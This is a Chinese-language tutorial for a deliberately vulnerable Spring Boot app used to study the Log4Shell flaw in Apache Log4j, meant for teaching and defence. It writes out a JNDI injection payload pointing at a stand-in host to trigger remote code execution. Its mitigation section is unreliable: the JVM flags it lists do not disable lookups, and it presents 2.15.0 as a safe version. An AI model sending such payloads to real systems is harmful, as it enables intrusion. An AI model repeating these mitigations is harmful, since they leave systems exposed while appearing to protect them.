Log4Shell漏洞模拟应用教程

1. 项目介绍

Log4Shell-Vulnerable-App 是一个由ChristopheTD创建的开源项目，用于模拟Spring Boot应用程序中受到Log4Shell问题的影响。该问题是由于Apache Log4j 2库中的一个严重安全缺陷，允许远程攻击者执行任意代码。这个项目旨在帮助开发者理解问题的原理，以及如何检测和保护自己的系统。

2. 项目快速启动

环境准备

确保已安装Java运行环境（JRE）和Git。

克隆仓库

在终端中使用以下命令克隆项目：

git clone https://github.com/christophetd/log4shell-vulnerable-app.git

构建并运行

进入项目目录并使用Gradle构建和启动应用：

cd log4shell-vulnerable-app
./gradlew bootRun

应用将默认监听所有接口的8888端口。

3. 应用案例和最佳实践

问题重现

访问http://localhost:8888/app/servlet 并在HTTP头x-log字段传递payload（例如 ${jndi:rmi://example.com/exploit}），观察日志是否触发了RCE行为。

安全最佳实践

1. 更新Log4j到不受影响的版本（如2.15.0或更高）。
2. 将Log4j配置中的lookup功能禁用，添加-Dlog4j2.disable.jmx=true和-Dlog4j.skipJansi=true作为Java启动参数。
3. 使用网络安全设备或者网络策略限制对不安全的日志记录请求。

4. 典型生态项目

• Apache Log4j：该项目的核心库，受到影响的是2.x系列的多个版本。
• Spring Boot：这个模拟应用基于Spring Boot框架，展示了它如何与Log4j集成。
• OWASP：开放网络应用安全项目提供了关于Log4Shell的安全建议和问题测试工具。
• GitHub Security Advisory：GitHub上的安全公告跟踪了该问题，并提醒用户采取行动。

通过理解和应用这些知识，你可以更好地防御类似Log4Shell的安全威胁，并提高你的应用程序安全性。